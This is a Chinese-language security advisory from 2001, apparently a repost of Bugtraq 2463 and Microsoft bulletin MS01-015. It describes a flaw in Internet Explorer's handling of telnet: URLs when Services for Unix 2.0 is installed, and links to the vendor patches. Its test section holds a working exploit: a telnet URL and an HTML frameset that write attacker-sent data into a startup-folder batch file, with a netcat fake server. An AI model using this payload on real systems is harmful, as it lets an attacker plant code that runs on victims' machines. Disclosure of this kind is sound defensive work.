发布日期: 2001-3-15
受影响的系统:
安装了Services for Unix 2.0附加包的Internet explorer的所有版本
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 2463
随Services for Unix 2.0一起安装的Telnet客户程序在与IE进行交互时存在漏洞,使得攻
击者可以用指定的数据来覆盖或创建任意文件。该漏洞发生在IE执行"telnet"命令时,IE
将把URL中指定的命令行参数传递给telnet程序。
Win2000中的Telnet客户程序包含一个客户端的日志记录选项,所有的telnet会话数据将记
录在该选项指定的文件中。通过指定telnet命令中的"-f"标志及相应的文件名,所有的会
话数据都将记录到该文件中。
只有安装了Services for Unix 2.0附加包的系统才会受影响,Services for Unix 2.0在
默认情况下不随任何系统一起发行,需要单独安装。
<* 来源:Oliver Friedrichs (of@securityfocus.com)
Microsoft Security Bulletin (MS01-015)
*>
测试程序:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
给IE提供类似如下的URL:
telnet:-f%20\file.txt%20host
上述例子将使IE启动telnet客户程序,连接到名为host的主机,并将所有的输出记录在文件"\file.txt"中。攻击者可以利用netcat之类的工具建立假的服务器监听在telnet端口,并发送指定的数据到客户端,通过这种方法就可以把任意数据写入指定的文件中。在telnet的命令行中可以指定任意端口号,所以服务器不必监听在23端口。
而且,启动telnet客户程序的过程可以嵌入在已有的HTML页面中,这样可使其自动执行。本漏洞也可以通过Outlook来利用,因为默认情况下Outlook会处理HTML信息。
<html>
<frameset rows="100%,*">
<frame src=about:blank>
<frame src=telnet:-f%20\Documents%20and%Settings\All%20Users\start%20menu\programs\startup\boom.bat%20host%208000>
</frameset>
</html>
上述例子将把来自名为host的主机的8000口的数据写入到用于所有用户的启动目录的boom.bat文件中。假定登录的用户具有相应的权限,这将创建一个批处理文件,以后每当用户登录时该批处理文件都会得到执行。如果攻击者知道当前登录的用户的名字,他可以写入到当前用户的相应目录中,而当前用户在该目录中肯定有创建文件的权限。
--------------------------------------------------------------------------------
建议:
厂商补丁:
微软已经为此发布了一个安全公告(MS01-015)和相应的补丁.
微软安全公告(MS01-015):
http://www.microsoft.com/technet/security/bulletin/MS01-015.asp
补丁下载:
IE 5.01 SP1 and IE 5.5 SP1(对于已经安装了Services for Unix 2.0的用户):
http://www.microsoft.com/windows/ie/download/critical/q286043/default.asp